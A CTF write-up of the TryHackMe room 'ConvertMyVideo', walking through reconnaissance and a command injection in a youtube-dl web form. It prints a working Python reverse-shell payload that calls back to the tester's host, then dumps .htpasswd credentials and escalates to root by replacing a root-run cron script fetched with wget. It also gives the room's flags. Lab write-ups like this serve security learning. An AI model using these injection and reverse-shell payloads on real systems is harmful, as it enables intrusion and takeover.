✍️
Write-ups
Index
  • Main Page
  • HackTheBox "Analytics"
  • Keep Your Domains
  • The .whoswho gTLD
  • HackTheBox "Soccer"
  • TryHackMe "ConvertMyVideo"
  • TryHackMe "Simple CTF"
  • HackTheBox "Investigation"
  • HackTheBox "Inject"
  • HackTheBox "Precious"
  • HackTheBox "Busqueda"
  • HackTheBox "Agile"
  • Not Fixing The Possibly Unfixable
Powered by GitBook
On this page
  • Introduction
  • User Own
  • What is the name of the secret folder?
  • What is the user to access the secret folder?
  • What is the user flag?
  • System Own
  • What is the root flag?

TryHackMe "ConvertMyVideo"

April 22nd, 2023

PreviousHackTheBox "Soccer"NextTryHackMe "Simple CTF"

Last updated 2 years ago

Introduction

is a medium room released on May 2nd, 2020 by overjt.

User Own

What is the name of the secret folder?

Nmap scan:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-22 15:25 EDT
Nmap scan report for 10.10.xx.xx
Host is up (0.10s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 651bfc741039dfddd02df0531ceb6dec (RSA)
|   256 c42804a5c3b96a955a4d7a6e46e214db (ECDSA)
|_  256 ba07bbcd424af293d105d0b34cb1d9b1 (ED25519)
80/tcp   open     http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
3737/tcp filtered xpanel
5850/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.82 seconds

The system is running a website that converts YouTube videos to MP3 files. Running ffuf on the website shows a subdirectory called admin.

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.xx.xx/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

[Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 2563ms]
    * FUZZ: .htpasswd

[Status: 401, Size: 460, Words: 42, Lines: 15, Duration: 163ms]
    * FUZZ: admin

[Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 236ms]
    * FUZZ: .hta

[Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 236ms]
    * FUZZ: .htaccess

[Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 160ms]
    * FUZZ: images

[Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 158ms]
    * FUZZ: js

[Status: 200, Size: 747, Words: 154, Lines: 20, Duration: 5429ms]
    * FUZZ: index.php

[Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 160ms]
    * FUZZ: server-status

[Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 160ms]
    * FUZZ: tmp

:: Progress: [4713/4713] :: Job [1/1] :: 178 req/sec :: Duration: [0:00:32] :: Errors: 0 ::

What is the user to access the secret folder?

The website takes an input for a YouTube ID. Supplying nothing shows the website is using youtube-dl. Checking the JavaScript for the website in main.js shows that the input is being concatenated to the base YouTube URL.

$(function () {
    $("#convert").click(function () {
        $("#message").html("Converting...");
        $.post("/", { yt_url: "https://www.youtube.com/watch?v=" + $("#ytid").val() }, function (data) {
            try {
                data = JSON.parse(data);
                if(data.status == "0"){
                    $("#message").html("<a href='" + data.result_url + "'>Download MP3</a>");
                }
                else{
                    console.log(data);
                    $("#message").html("Oops! something went wrong");
                }
            } catch (error) {
                console.log(data);
                $("#message").html("Oops! something went wrong");
            }
        });
    });

});

Using the input --;id; shows that the website is vulnerable to command injection.

{
  "status": 127,
  "errors": "WARNING: Assuming --restrict-filenames since file system encoding cannot encode all characters. Set the LC_ALL environment variable to fix this.\nUsage: youtube-dl [OPTIONS] URL [URL...]\n\nyoutube-dl: error: You must provide at least one URL.\nType youtube-dl --help to see a list of all options.\nsh: 1: -f: not found\n",
  "url_orginal": "--;id;",
  "output": "uid=33(www-data) gid=33(www-data) groups=33(www-data)\n",
  "result_url": "/tmp/downloads/6444366a5e64a.mp3"
}

A Python reverse shell can be used to get in as www-data.

Input
--;python${IFS}-c${IFS}'socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.6.xx.xx",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")';
Terminal
nc -nvlp 1234            
listening on [any] 1234 ...
connect to [10.6.xx.xx] from (UNKNOWN) [10.10.xx.xx] 43554
$ id    
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls
ls
admin  images  index.php  js  style.css  tmp

Checking the admin directory:

ls admin -a
.  ..  .htaccess  .htpasswd  flag.txt  index.php

The contents of .htpasswd are:

$ cat admin/.htpasswd   
cat admin/.htpasswd
itsmeadmin:$apr1$tbcm2uwv$UP1ylvgp4.zLKxWj8mc6y/

The login credentials for the admin page are the username itsmeadmin and a hashed password.

What is the user flag?

The user flag is inside the admin directory.

$ cat admin/flag.txt
cat admin/flag.txt
flag{0d8486a0c0c42503bb60ac77f4046ed7}

The flag is flag{0d8486a0c0c42503bb60ac77f4046ed7}.

System Own

What is the root flag?

Inside tmp is a file called clean.sh. Replacing the contents of clean.sh with a reverse shell will eventually get you in as root, as root runs this file periodically to remove all download files.

Terminal 1
python3 -m http.server 80
Terminal 2
wget http://10.6.xx.xx/clean.sh -O clean.sh
--2023-04-22 20:00:08--  http://10.6.xx.xx/clean.sh
Connecting to 10.6.xx.xx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 49 [text/x-sh]
Saving to: 'clean.sh'

clean.sh            100%[===================>]      49  --.-KB/s    in 0s      

2023-04-22 20:00:09 (8.09 MB/s) - 'clean.sh' saved [49/49]
Terminal 3
nc -nvlp 1235    
listening on [any] 1235 ...
connect to [10.6.xx.xx] from (UNKNOWN) [10.10.xx.xx] 54788
mesg: ttyname failed: Inappropriate ioctl for device
cat /root/root.txt
flag{d9b368018e912b541a4eb68399c5e94a}

The root flag inside /root/root.txt is flag{d9b368018e912b541a4eb68399c5e94a}.

And that's the room!

Note: Spaces invalidate any command, so the string can be used as a substitute for a space.

${IFS}
ConvertMyVideo
Banner